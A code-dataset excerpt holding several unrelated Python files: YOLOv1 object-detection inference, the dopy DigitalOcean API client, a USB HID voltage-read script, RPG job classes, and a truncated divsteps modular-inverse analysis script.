prediction[\"boxes\"][ms]\n unique_labels = labels.unique()\n for c in unique_labels:\n if c in filter_labels:continue\n\n # Get the detections with the particular class\n temp = labels == c\n _scores = scores[temp]\n _labels = labels[temp]\n _boxes = boxes[temp]\n if len(_labels) > 1:\n # Sort the detections by maximum objectness confidence\n # _, conf_sort_index = torch.sort(_scores, descending=True)\n # _scores=_scores[conf_sort_index]\n # _boxes=_boxes[conf_sort_index]\n\n # \"\"\"\n keep=py_cpu_nms(_boxes.cpu().numpy(),_scores.cpu().numpy(),nms_thres)\n # keep = nms(_boxes, _scores, nms_thres)\n # keep = batched_nms(_boxes, _scores,_labels, nms_thres)\n last_scores.extend(_scores[keep])\n last_labels.extend(_labels[keep])\n last_boxes.extend(_boxes[keep])\n\n else:\n last_scores.extend(_scores)\n last_labels.extend(_labels)\n last_boxes.extend(_boxes)\n\n return {\"scores\": last_scores, \"labels\": last_labels, \"boxes\": last_boxes}\n\ndef vis_class(img, pos, class_str, font_scale=0.35):\n \"\"\"Visualizes the class.\"\"\"\n # temp_GREEN=np.clip(np.asarray(_GREEN)*label,0,255).astype(np.uint8).tolist()\n\n x0, y0 = int(pos[0]), int(pos[1])\n # Compute text size.\n txt = class_str\n font = cv2.FONT_HERSHEY_SIMPLEX\n ((txt_w, txt_h), _) = cv2.getTextSize(txt, font, font_scale, 1)\n # Place text background.\n back_tl = x0, y0 - int(1.2 * txt_h)\n back_br = x0 + txt_w, y0\n cv2.rectangle(img, back_tl, back_br, _GREEN, -1) # _GREEN\n # Show text.\n txt_tl = x0, y0 - int(0.2 * txt_h)\n cv2.putText(img, txt, txt_tl, font, font_scale, _GRAY, lineType=cv2.LINE_AA)\n cv2.rectangle(img,(pos[0],pos[1]),(pos[2],pos[3]),_GREEN,2) # _GREEN\n return img\n\ndef draw_rect(image,pred,scale_factor):\n labels = pred[\"labels\"]\n bboxs = pred[\"boxes\"]\n scores = pred[\"scores\"]\n h,w,size=scale_factor\n\n for label,bbox,score in zip(labels,bboxs,scores):\n label=label.cpu().numpy()\n bbox=bbox.cpu().numpy()#.astype(np.int16)\n score=score.cpu().numpy()\n class_str=\"%s:%.3f\"%(classes[int(label)],score) # 跳过背景\n # pos=list(map(lambda x:int(x/scale_factor),bbox))\n if h>=w:\n bbox = bbox*h / size\n diff = h - w\n bbox[0]-= diff // 2\n bbox[2]-= diff // 2\n else:\n bbox = bbox * w / size\n diff = w - h\n bbox[1] -= diff // 2\n bbox[3] -= diff // 2\n\n pos = list(map(int, bbox))\n\n image=vis_class(image,pos,class_str,0.5)\n return image\n\nclass YOLOV1Infer(nn.Module):\n def __init__(self,root:str):\n super(YOLOV1Infer,self).__init__()\n self.batch_size = 1\n # root = \"\"\n seed = 100\n resize = 416\n self.num_classes = 1 # 不包含背景\n self.num_anchors = 2 # 2个box\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if self.use_cuda else \"cpu\")\n torch.manual_seed(seed)\n kwargs = {'num_workers': 5, 'pin_memory': True} if self.use_cuda else {}\n self.save_model = \"./models/model.pt\"\n\n trainDataset = InferDataset(root, transforms=transforms.Compose(\n [\n # transforms.Resize((resize, resize)),\n # transforms.ToTensor(),\n # transforms.Normalize([0.485, 0.456, 0.406],[0.229, 0.224, 0.225])\n transforms.ToTensor(),\n Resize_fixed(resize, training=False)\n ]\n ))\n\n self.data_loader = torch.utils.data.DataLoader(\n trainDataset,\n batch_size=self.batch_size, shuffle=False,\n **kwargs\n )\n\n # self.network = YOLOV1Net(self.num_classes, \"resnet18\", 512, True, 0.5)\n self.network = YOLOV1Net(self.num_classes, \"resnet50\", 2048, True, 0.5)\n\n if self.use_cuda:\n self.network.to(self.device)\n self.loss_func = YOLOv1Loss(self.device, self.num_anchors, self.num_classes)\n\n self.network.load_state_dict(torch.load(self.save_model))\n\n self.conf_thres = 0.7\n self.nms_thres = 0.4\n self.image_mean = [0.485, 0.456, 0.406]\n self.image_std = [0.229, 0.224, 0.225]\n\n def renormalize(self, image):\n dtype, device = image.dtype, image.device\n mean = torch.as_tensor(self.image_mean, dtype=dtype, device=device)\n std = torch.as_tensor(self.image_std, dtype=dtype, device=device)\n # return (image - mean[:, None, None]) / std[:, None, None]\n return (image *std[None,:, None, None])+mean[None,:, None, None]\n\n def forward(self):\n self.network.eval()\n with torch.no_grad():\n for idx, (data,path,origin_img) in enumerate(self.data_loader):\n if self.use_cuda:\n data = data.to(self.device)\n\n output = self.network(data)\n detections = self.loss_func(output)\n\n if len(detections) > 0:\n _detections = apply_nms(detections[0], self.conf_thres, self.nms_thres, device=self.device, filter_labels=[])\n if _detections is None: continue\n\n image = origin_img[0].cpu().numpy()\n image = image.astype(np.uint8)#.transpose([1, 2, 0])\n # print(\"===========\",image.shape,\"====================\")\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n scale_factor = [image.shape[0],image.shape[1],data.size(2)]\n image = draw_rect(image, _detections, scale_factor)\n\n # save\n newPath = path[0].replace(\"PNGImages\",\"result\")\n if not os.path.exists(os.path.dirname(newPath)):os.makedirs(os.path.dirname(newPath))\n cv2.imwrite(newPath,image)\n\n # cv2.imshow(\"test\", image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\nif __name__==\"__main__\":\n model = YOLOV1Infer(\"../valid/PNGImages\")\n model()","repo_name":"wucng/MLAndDL","sub_path":"DL/yolo/YOLOV1/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17412949232","text":"#!/usr/bin/env python\n#coding: utf-8\n\"\"\"\nThis module simply sends request to the Digital Ocean API,\nand returns their response as a dict.\n\"\"\"\n\nimport requests\nimport json as json_module\nfrom six import wraps\n\nAPI_ENDPOINT = 'https://api.digitalocean.com'\n\nclass DoError(RuntimeError):\n pass\n\n\ndef paginated(func):\n @wraps(func)\n def wrapper(self, url, headers=None, params=None, method='GET'):\n if method != 'GET':\n return func(self, url, headers, params, method)\n\n nxt = url\n out = {}\n\n while nxt is not None:\n result = func(self, nxt, headers, params, 'GET')\n nxt = None\n\n if isinstance(result, dict):\n for key, value in result.items():\n if key in out and isinstance(out[key], list):\n out[key].extend(value)\n else:\n out[key] = value\n\n if 'links' in result \\\n and 'pages' in result['links'] \\\n and 'next' in result['links']['pages']:\n nxt = result['links']['pages']['next']\n\n return out\n return wrapper\n\n\nclass DoManager(object):\n def __init__(self, client_id, api_key, api_version=1):\n self.api_endpoint = API_ENDPOINT\n self.client_id = client_id\n self.api_key = api_key\n self.api_version = int(api_version)\n\n if self.api_version == 2:\n self.api_endpoint += '/v2'\n if self.api_version == 1:\n self.api_endpoint += '/v1'\n\n def all_active_droplets(self):\n json = self.request('/droplets/')\n if self.api_version == 2:\n for index in range(len(json['droplets'])):\n self.populate_droplet_ips(json['droplets'][index])\n return json['droplets']\n\n def new_droplet(self, name, size_id, image_id, region_id,\n ssh_key_ids=None, virtio=True, private_networking=False,\n backups_enabled=False, user_data=None, ipv6=False):\n\n if self.api_version == 2:\n params = {\n 'name': str(name),\n 'size': str(size_id),\n 'image': str(image_id),\n 'region': str(region_id),\n 'virtio': str(virtio).lower(),\n 'ipv6': str(ipv6).lower(),\n 'private_networking': str(private_networking).lower(),\n 'backups': str(backups_enabled).lower(),\n }\n if ssh_key_ids:\n # Need to be an array in v2\n if isinstance(ssh_key_ids, basestring):\n ssh_key_ids = [ssh_key_ids]\n\n if type(ssh_key_ids) == list:\n for index in range(len(ssh_key_ids)):\n ssh_key_ids[index] = str(ssh_key_ids[index])\n\n params['ssh_keys'] = ssh_key_ids\n\n if user_data:\n params['user_data'] = user_data\n\n json = self.request('/droplets', params=params, method='POST')\n created_id = json['droplet']['id']\n json = self.show_droplet(created_id)\n return json\n else:\n params = {\n 'name': str(name),\n 'size_id': str(size_id),\n 'image_id': str(image_id),\n 'region_id': str(region_id),\n 'virtio': str(virtio).lower(),\n 'private_networking': str(private_networking).lower(),\n 'backups_enabled': str(backups_enabled).lower(),\n }\n if ssh_key_ids:\n # Need to be a comma separated string\n if type(ssh_key_ids) == list:\n ssh_key_ids = ','.join(ssh_key_ids)\n params['ssh_key_ids'] = ssh_key_ids\n\n json = self.request('/droplets/new', params=params)\n return json['droplet']\n\n def show_droplet(self, droplet_id):\n json = self.request('/droplets/%s' % droplet_id)\n if self.api_version == 2:\n self.populate_droplet_ips(json['droplet'])\n return json['droplet']\n\n def droplet_v2_action(self, droplet_id, droplet_type, params=None):\n if params is None:\n params = {}\n params['type'] = droplet_type\n json = self.request('/droplets/%s/actions' % droplet_id, params=params, method='POST')\n return json\n\n def reboot_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'reboot')\n else:\n json = self.request('/droplets/%s/reboot/' % droplet_id)\n json.pop('status', None)\n return json\n\n def power_cycle_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'power_cycle')\n else:\n json = self.request('/droplets/%s/power_cycle/' % droplet_id)\n json.pop('status', None)\n return json\n\n def shutdown_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'shutdown')\n else:\n json = self.request('/droplets/%s/shutdown/' % droplet_id)\n json.pop('status', None)\n return json\n\n def power_off_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'power_off')\n else:\n json = self.request('/droplets/%s/power_off/' % droplet_id)\n json.pop('status', None)\n return json\n\n def power_on_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'power_on')\n else:\n json = self.request('/droplets/%s/power_on/' % droplet_id)\n json.pop('status', None)\n return json\n\n def password_reset_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'password_reset')\n else:\n json = self.request('/droplets/%s/password_reset/' % droplet_id)\n json.pop('status', None)\n return json\n\n def resize_droplet(self, droplet_id, size_id):\n if self.api_version == 2:\n params = {'size': size_id}\n json = self.droplet_v2_action(droplet_id, 'resize', params)\n else:\n params = {'size_id': size_id}\n json = self.request('/droplets/%s/resize/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def snapshot_droplet(self, droplet_id, name):\n params = {'name': name}\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'snapshot', params)\n else:\n json = self.request('/droplets/%s/snapshot/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def restore_droplet(self, droplet_id, image_id):\n if self.api_version == 2:\n params = {'image': image_id}\n json = self.droplet_v2_action(droplet_id, 'restore', params)\n else:\n params = {'image_id': image_id}\n json = self.request('/droplets/%s/restore/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def rebuild_droplet(self, droplet_id, image_id):\n if self.api_version == 2:\n params = {'image': image_id}\n json = self.droplet_v2_action(droplet_id, 'rebuild', params)\n else:\n params = {'image_id': image_id}\n json = self.request('/droplets/%s/rebuild/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def enable_backups_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'enable_backups')\n else:\n json = self.request('/droplets/%s/enable_backups/' % droplet_id)\n json.pop('status', None)\n return json\n\n def disable_backups_droplet(self, droplet_id):\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'disable_backups')\n else:\n json = self.request('/droplets/%s/disable_backups/' % droplet_id)\n json.pop('status', None)\n return json\n\n def rename_droplet(self, droplet_id, name):\n params = {'name': name}\n if self.api_version == 2:\n json = self.droplet_v2_action(droplet_id, 'rename', params)\n else:\n json = self.request('/droplets/%s/rename/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def destroy_droplet(self, droplet_id, scrub_data=True):\n if self.api_version == 2:\n json = self.request('/droplets/%s' % droplet_id, method='DELETE')\n else:\n params = {'scrub_data': '1' if scrub_data else '0'}\n json = self.request('/droplets/%s/destroy/' % droplet_id, params)\n json.pop('status', None)\n return json\n\n def populate_droplet_ips(self, droplet):\n droplet[u'ip_address'] = ''\n for networkIndex in range(len(droplet['networks']['v4'])):\n network = droplet['networks']['v4'][networkIndex]\n if network['type'] == 'public':\n droplet[u'ip_address'] = network['ip_address']\n if network['type'] == 'private':\n droplet[u'private_ip_address'] = network['ip_address']\n\n#regions==========================================\n def all_regions(self):\n json = self.request('/regions/')\n return json['regions']\n\n#images==========================================\n def all_images(self, filter='global'):\n params = {'filter': filter}\n json = self.request('/images/', params)\n return json['images']\n\n def private_images(self):\n if self.api_version == 2:\n json = self.request('/images?private=true')\n return json['images']\n else:\n params = {'filter': 'my_images'}\n json = self.request('/images/', params)\n return json['images']\n\n def image_v2_action(self, image_id, image_type, params=None):\n if params is None:\n params = {}\n params['type'] = image_type\n json = self.request('/images/%s/actions' % image_id, params=params, method='POST')\n return json\n\n def show_image(self, image_id):\n params = {'image_id': image_id}\n json = self.request('/images/%s' % image_id)\n return json['image']\n\n def destroy_image(self, image_id):\n if self.api_version == 2:\n self.request('/images/%s' % image_id, method='DELETE')\n else:\n self.request('/images/%s/destroy' % image_id)\n return True\n\n def transfer_image(self, image_id, region_id):\n if self.api_version == 2:\n params = {'region': region_id}\n json = self.image_v2_action(image_id, 'transfer', params)\n else:\n params = {'region_id': region_id}\n json = self.request('/images/%s/transfer' % image_id, params)\n json.pop('status', None)\n return json\n\n#ssh_keys=========================================\n def all_ssh_keys(self):\n if self.api_version == 2:\n json = self.request('/account/keys')\n else:\n json = self.request('/ssh_keys/')\n return json['ssh_keys']\n\n def new_ssh_key(self, name, pub_key):\n if self.api_version == 2:\n params = {'name': name, 'public_key': pub_key}\n json = self.request('/account/keys', params, method='POST')\n else:\n params = {'name': name, 'ssh_pub_key': pub_key}\n json = self.request('/ssh_keys/new/', params)\n return json['ssh_key']\n\n def show_ssh_key(self, key_id):\n if self.api_version == 2:\n json = self.request('/account/keys/%s/' % key_id)\n else:\n json = self.request('/ssh_keys/%s/' % key_id)\n return json['ssh_key']\n\n def edit_ssh_key(self, key_id, name, pub_key):\n if self.api_version == 2:\n params = {'name': name} # v2 API doesn't allow to change key body now\n json = self.request('/account/keys/%s/' % key_id, params, method='PUT')\n else:\n params = {'name': name, 'ssh_pub_key': pub_key} # the doc needs to be improved\n json = self.request('/ssh_keys/%s/edit/' % key_id, params)\n return json['ssh_key']\n\n def destroy_ssh_key(self, key_id):\n if self.api_version == 2:\n self.request('/account/keys/%s' % key_id, method='DELETE')\n else:\n self.request('/ssh_keys/%s/destroy/' % key_id)\n return True\n\n#sizes============================================\n def sizes(self):\n json = self.request('/sizes/')\n return json['sizes']\n\n#domains==========================================\n def all_domains(self):\n json = self.request('/domains/')\n return json['domains']\n\n def new_domain(self, name, ip):\n params = {\n 'name': name,\n 'ip_address': ip\n }\n if self.api_version == 2:\n json = self.request('/domains', params=params, method='POST')\n else:\n json = self.request('/domains/new/', params)\n return json['domain']\n\n def show_domain(self, domain_id):\n json = self.request('/domains/%s/' % domain_id)\n return json['domain']\n\n def destroy_domain(self, domain_id):\n if self.api_version == 2:\n self.request('/domains/%s' % domain_id, method='DELETE')\n else:\n self.request('/domains/%s/destroy/' % domain_id)\n return True\n\n def all_domain_records(self, domain_id):\n json = self.request('/domains/%s/records/' % domain_id)\n if self.api_version == 2:\n return json['domain_records']\n return json['records']\n\n def new_domain_record(self, domain_id, record_type, data, name=None, priority=None, port=None, weight=None):\n params = {'data': data}\n\n if self.api_version == 2:\n params['type'] = record_type\n else:\n params['record_type'] = record_type\n\n if name: params['name'] = name\n if priority: params['priority'] = priority\n if port: params['port'] = port\n if weight: params['weight'] = weight\n\n if self.api_version == 2:\n json = self.request('/domains/%s/records/' % domain_id, params, method='POST')\n return json['domain_record']\n else:\n json = self.request('/domains/%s/records/new/' % domain_id, params)\n return json['record']\n\n def show_domain_record(self, domain_id, record_id):\n json = self.request('/domains/%s/records/%s' % (domain_id, record_id))\n if self.api_version == 2:\n return json['domain_record']\n return json['record']\n\n def edit_domain_record(self, domain_id, record_id, record_type, data, name=None, priority=None, port=None, weight=None):\n if self.api_version == 2:\n params = {'name': name} # API v.2 allows only record name change\n json = self.request('/domains/%s/records/%s' % (domain_id, record_id), params, method='PUT')\n return json['domain_record']\n\n params = {\n 'record_type': record_type,\n 'data': data,\n }\n\n if name: params['name'] = name\n if priority: params['priority'] = priority\n if port: params['port'] = port\n if weight: params['weight'] = weight\n json = self.request('/domains/%s/records/%s/edit/' % (domain_id, record_id), params)\n return json['record']\n\n def destroy_domain_record(self, domain_id, record_id):\n if self.api_version == 2:\n self.request('/domains/%s/records/%s' % (domain_id, record_id), method='DELETE')\n else:\n self.request('/domains/%s/records/%s/destroy/' % (domain_id, record_id))\n return True\n\n#events(actions in v2 API)========================\n def show_all_actions(self):\n if self.api_version == 2:\n json = self.request('/actions')\n return json['actions']\n return False # API v.1 haven't this functionality\n\n def show_action(self, action_id):\n if self.api_version == 2:\n json = self.request('/actions/%s' % event_id)\n return json['action']\n return show_event(self, action_id)\n\n def show_event(self, event_id):\n if self.api_version == 2:\n return show_action(self, event_id)\n json = self.request('/events/%s' % event_id)\n return json['event']\n\n#floating_ips=====================================\n v2_api_required_str = ('This feature requires the V2 API. ' \\\n 'In order to continue, update DO_API_VERSION to 2.')\n\n def all_floating_ips(self):\n \"\"\"\n Lists all of the Floating IPs available on the account.\n \"\"\"\n if self.api_version == 2:\n json = self.request('/floating_ips')\n return json['floating_ips']\n else:\n raise DoError(v2_api_required_str)\n\n def new_floating_ip(self, **kwargs):\n \"\"\"\n Creates a Floating IP and assigns it to a Droplet or reserves it to a region.\n \"\"\"\n droplet_id = kwargs.get('droplet_id')\n region = kwargs.get('region')\n\n if self.api_version == 2:\n if droplet_id is not None and region is not None:\n raise DoError('Only one of droplet_id and region is required to create a Floating IP. ' \\\n 'Set one of the variables and try again.')\n elif droplet_id is None and region is None:\n raise DoError('droplet_id or region is required to create a Floating IP. ' \\\n 'Set one of the variables and try again.')\n else:\n if droplet_id is not None:\n params = {'droplet_id': droplet_id}\n else:\n params = {'region': region}\n\n json = self.request('/floating_ips', params=params, method='POST')\n return json['floating_ip']\n else:\n raise DoError(v2_api_required_str)\n\n def destroy_floating_ip(self, ip_addr):\n \"\"\"\n Deletes a Floating IP and removes it from the account.\n \"\"\"\n if self.api_version == 2:\n self.request('/floating_ips/' + ip_addr, method='DELETE')\n else:\n raise DoError(v2_api_required_str)\n\n def assign_floating_ip(self, ip_addr, droplet_id):\n \"\"\"\n Assigns a Floating IP to a Droplet.\n \"\"\"\n if self.api_version == 2:\n params = {'type': 'assign','droplet_id': droplet_id}\n\n json = self.request('/floating_ips/' + ip_addr + '/actions', params=params, method='POST')\n return json['action']\n else:\n raise DoError(v2_api_required_str)\n\n def unassign_floating_ip(self, ip_addr):\n \"\"\"\n Unassign a Floating IP from a Droplet.\n The Floating IP will be reserved in the region but not assigned to a Droplet.\n \"\"\"\n if self.api_version == 2:\n params = {'type': 'unassign'}\n\n json = self.request('/floating_ips/' + ip_addr + '/actions', params=params, method='POST')\n return json['action']\n else:\n raise DoError(v2_api_required_str)\n\n def list_floating_ip_actions(self, ip_addr):\n \"\"\"\n Retrieve a list of all actions that have been executed on a Floating IP.\n \"\"\"\n if self.api_version == 2:\n json = self.request('/floating_ips/' + ip_addr + '/actions')\n return json['actions']\n else:\n raise DoError(v2_api_required_str)\n\n def get_floating_ip_action(self, ip_addr, action_id):\n \"\"\"\n Retrieve the status of a Floating IP action.\n \"\"\"\n if self.api_version == 2:\n json = self.request('/floating_ips/' + ip_addr + '/actions/' + action_id)\n return json['action']\n else:\n raise DoError(v2_api_required_str)\n\n#tags=====================================\n def new_tag(self, name):\n if self.api_version == 2:\n params = {\n 'name': str(name)\n }\n json = self.request('/tags', params=params, method='POST')\n return json['tag']\n else:\n raise DoError(self.v2_api_required_str)\n\n def show_tag(self, name):\n if self.api_version == 2:\n json = self.request('/tags/%s' % name, method='GET')\n return json['tag']\n else:\n raise DoError(self.v2_api_required_str)\n\n def all_tags(self):\n if self.api_version == 2:\n json = self.request('/tags', method='GET')\n return json['tags']\n else:\n raise DoError(self.v2_api_required_str)\n\n def edit_tag(self, current_name, new_name):\n if self.api_version == 2:\n params = {\n 'name': str(new_name)\n }\n json = self.request('/tags/%s' % current_name, params=params, method='PUT')\n return json['tag']\n else:\n raise DoError(self.v2_api_required_str)\n\n def destroy_tag(self, name):\n if self.api_version == 2:\n json = self.request('/tags/%s' % name, method='DELETE')\n json.pop('status', None)\n return json\n else:\n raise DoError(self.v2_api_required_str)\n\n def tag_resource(self, tag_name, resource_id, resource_type='droplet'):\n if self.api_version == 2:\n params = {\n 'resources': [\n {\n 'resource_id': str(resource_id),\n 'resource_type': str(resource_type)\n }\n ]\n }\n\n json = self.request('/tags/%s/resources' % tag_name, params=params, method='POST')\n json.pop('status', None)\n return json\n else:\n raise DoError(self.v2_api_required_str)\n\n def untag_resource(self, tag_name, resource_id, resource_type='droplet'):\n if self.api_version == 2:\n params = {\n 'resources': [\n {\n 'resource_id': str(resource_id),\n 'resource_type': str(resource_type)\n }\n ]\n }\n\n json = self.request('/tags/%s/resources' % tag_name, params=params, method='DELETE')\n json.pop('status', None)\n return json\n else:\n raise DoError(self.v2_api_required_str)\n\n#low_level========================================\n def request(self, path, params={}, method='GET'):\n if not path.startswith('/'):\n path = '/'+path\n url = self.api_endpoint+path\n\n if self.api_version == 2:\n headers = {'Authorization': \"Bearer %s\" % self.api_key}\n resp = self.request_v2(url, params=params, headers=headers, method=method)\n else:\n params['client_id'] = self.client_id\n params['api_key'] = self.api_key\n resp = self.request_v1(url, params, method=method)\n\n return resp\n\n def request_v1(self, url, params={}, method='GET'):\n try:\n resp = requests.get(url, params=params, timeout=60)\n json = resp.json()\n except ValueError: # requests.models.json.JSONDecodeError\n raise ValueError(\"The API server doesn't respond with a valid json\")\n except requests.RequestException as e: # errors from requests\n raise RuntimeError(e)\n\n if resp.status_code != requests.codes.ok:\n if json:\n if 'error_message' in json:\n raise DoError(json['error_message'])\n elif 'message' in json:\n raise DoError(json['message'])\n # The JSON reponse is bad, so raise an exception with the HTTP status\n resp.raise_for_status()\n if json.get('status') != 'OK':\n raise DoError(json['error_message'])\n\n return json\n\n def process_response(self, response):\n if response.status_code == 204:\n return {'status': response.status_code}\n else:\n return response.json()\n\n @paginated\n def request_v2(self, url, headers={}, params={}, method='GET'):\n headers['Content-Type'] = 'application/json'\n\n try:\n if method == 'POST':\n resp = requests.post(url, data=json_module.dumps(params), headers=headers, timeout=60)\n json = self.process_response(resp)\n elif method == 'DELETE':\n resp = requests.delete(url, data=json_module.dumps(params), headers=headers, timeout=60)\n json = self.process_response(resp)\n elif method == 'PUT':\n resp = requests.put(url, headers=headers, params=params, timeout=60)\n json = resp.json()\n elif method == 'GET':\n resp = requests.get(url, headers=headers, params=params, timeout=60)\n json = resp.json()\n else:\n raise DoError('Unsupported method %s' % method)\n\n except ValueError: # requests.models.json.JSONDecodeError\n raise ValueError(\"The API server doesn't respond with a valid json\")\n except requests.RequestException as e: # errors from requests\n raise RuntimeError(e)\n\n if resp.status_code != requests.codes.ok:\n if json:\n if 'error_message' in json:\n raise DoError(json['error_message'])\n elif 'message' in json:\n raise DoError(json['message'])\n # The JSON reponse is bad, so raise an exception with the HTTP status\n resp.raise_for_status()\n\n if json.get('id') == 'not_found':\n raise DoError(json['message'])\n\n return json\n\n\nif __name__ == '__main__':\n import os\n if os.environ.get('DO_API_VERSION') == '2':\n api_token = os.environ.get('DO_API_TOKEN') or os.environ['DO_API_KEY']\n do = DoManager(None, api_token, 2)\n else:\n client_id = os.environ['DO_CLIENT_ID']\n api_key = os.environ['DO_API_KEY']\n do = DoManager(client_id, api_key, 1)\n import sys\n fname = sys.argv[1]\n import pprint\n # size_id: 66, image_id: 1601, region_id: 1\n pprint.pprint(getattr(do, fname)(*sys.argv[2:]))\n","repo_name":"Wiredcraft/dopy","sub_path":"dopy/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":26460,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"37"} +{"seq_id":"30737253605","text":"import hid\nimport time\n\n\ndef pad_or_truncate(some_list, target_len):\n return some_list[:target_len] + [0]*(target_len - len(some_list))\n\ndev = hid.device()\ndev.open(0x0483, 0x5750)\n\nprint(\"Manufacturer: %s\" % dev.get_manufacturer_string())\nprint(\"Product: %s\" % dev.get_product_string())\nprint(\"Serial No: %s\" % dev.get_serial_number_string())\n\n# enable non-blocking mode\ndev.set_nonblocking(1)\n\n# write some data to the device\nprint(\"Write the data\")\ndata = [0, 0x55, 0x55, 2, 0x0f]\ndata = pad_or_truncate(data, 65)\ndev.write(data)\n\n# wait\n#time.sleep(0.05)\n\n# read back the answer\nprint(\"Read the data\")\nresponse = []\nwhile True:\n d = dev.read(64, 50) \n if d:\n response.extend(d)\n else:\n break\n\nprint(f\"{(response[5] * 256 + response[4])/1000} VDC\")\n\nprint(\"Closing the device\")\ndev.close()","repo_name":"ccourson/xArmServoController","sub_path":"Python/hidapi.py","file_name":"hidapi.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"37"} +{"seq_id":"30000763979","text":"from Job import Job\n\nclass Medic(Job):\n def __init__(self):\n super().__init__()\n self.jobName = \"Medic\"\n self.description = \"\"\n self.nextJobs = ['Healer', 'Doctor']\n self.changeCStatBoosts([\n (\"Strength\", 0.1),\n (\"Speed\", 0.2),\n (\"Stamina\", 0.5),\n (\"HP\", 0.5),\n (\"Medical Expertise\", 0.2)\n ])\nclass Healer(Medic):\n def __init__(self):\n super().__init__()\n self.jobName = \"Healer\"\n self.description = \"\"\n self.nextJobs = ['Grand Healer', 'Elemental Healer', 'Black Healer']\n self.changeCStatBoosts([\n (\"Strength\", 0.1),\n (\"Speed\", 0.1),\n (\"Stamina\", 0.5),\n (\"HP\", 0.5),\n (\"MP\", 0.5),\n (\"Intelligence\", 0.2),\n (\"Medical Expertise\", 0.2)\n ])\nclass Doctor(Medic):\n def __init__(self):\n super().__init__()\n self.jobName = \"Doctor\"\n self.description = \"\"\n self.nextJobs = ['Surgeon', 'Psychologist', 'Master Doctor']\n self.changeCStatBoosts([\n (\"Strength\", 0.1),\n (\"Speed\", 0.1),\n (\"Stamina\", 0.5),\n (\"HP\", 0.5),\n (\"Medical Expertise\", 0.4)\n ])","repo_name":"achakka007/Aincrad","sub_path":"Finished/Jobs/Medic.py","file_name":"Medic.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21495287945","text":"#!/bin/env python\n\n\"\"\"Compute ranges of moduli that can be handled with given numbers of divsteps.\n\nOutput will include lines like these:\n\n ...\n 721 0x68c99daf6eb26776b8a7a2ace253df30d84c7c4328ac408aa128dc8ca448a777 (2**254.711324)\n 722 0x9e4ccd3a0a07119e8a58e4ff434f504ad45434b4af37b913db51296f40fa5a5b (2**255.306518)\n 723 0xaa040650e6d9c377b515b9e3d71fbfacc6c7f06f115dd0693166a8a64511ef26 (2**255.409524)\n 724 0x1030596cf6d817d1357f908ef70cdb00b38d047fbba852139babb6c8646fb15b2 (2**256.016930)\n ...\n\nindicating that e.g. for any input 1 <= f <= 0x9e4c..5a5b and 0 <= g <= f, 722 divstep\niterations is sufficient to reach g=0. That means 722 divsteps is sufficient for computing\nmodular inverses for any 255-bit modulus, and 724 is sufficient for any 256-bit modulus.\n\nThis code runs significantly faster in Pypy.\n\nWhen running with --half-delta analysis will be performed for a variant of divsteps\nthat is equivalent to the original one but with starting value delta=1/2 instead of\ndelta=1.\n\"\"\"\n\nimport argparse\nimport math\n\n# When running with --half-delta, we scale delta by a factor 2, and thus always increment\n# by 2 instead of 1.\nINC = 1\n\ndef convex_hull(points):\n \"\"\"Computes the convex hull of a set of 2D points.\n\n Input: a list of (x, y) pairs representing the points.\n Output: a list of vertices of the convex hull in counter-clockwise order.\n\n This implements Andrew's monotone chain algorithm, based on\n https://en.wikibooks.org/wiki/Algorithm_Implementation/Geometry/Convex_hull/Monotone_chain\n \"\"\"\n # Boring case: no points.\n if len(points) <= 1:\n return points\n # Sort the points lexicographically (tuples are compared lexicographically).\n points = sorted(points)\n # Build lower hull.\n lower = [points[0]]\n for point in points[1:]:\n while len(lower) >= 2 and ((lower[-1][0] - lower[-2][0]) * (point[1] - lower[-2][1]) <=\n (lower[-1][1] - lower[-2][1]) * (point[0] - lower[-2][0])):\n lower.pop()\n if lower[-1] != point:\n lower.append(point)\n if len(lower) == 1:\n return lower\n # Build upper hull.\n upper = [points[-1]]\n for point in reversed(points[:-1]):\n while len(upper) >= 2 and ((upper[-1][0] - upper[-2][0]) * (point[1] - upper[-2][1]) <=\n (upper[-1][1] - upper[-2][1]) * (point[0] - upper[-2][0])):\n upper.pop()\n if upper[-1] != point:\n upper.append(point)\n # Concatenation of the lower and upper hulls gives the convex hull.\n # The last point of each list is omitted because it is repeated at the beginning\n # of the other list.\n return lower[:-1] + upper[:-1]\n\ndef process_divstep(state):\n \"\"\"Apply one divstep to state.\n\n state is a dict of the form delta -> [points, abs_g], where points is a set of (f, g)\n coordinates (multiplied by 2**step so that they remain integral) that defines a convex\n hull of possible combinations of f and g. abs_g is the largest abs(g) in points, or\n the largest such value in any of the contributing hulls if that is smaller.\n\n Every invocation of this function will compute the new state based on the previous state,\n taking into account that not every transaction is possible for every delta, but always\n exploring both the \"odd g\" and \"even g\" variants.\n \"\"\"\n\n new_state = dict()\n for delta, (points, abs_g) in state.items():\n # Odd g:\n if delta > 0:\n # divsteps^n(delta,f,g) = 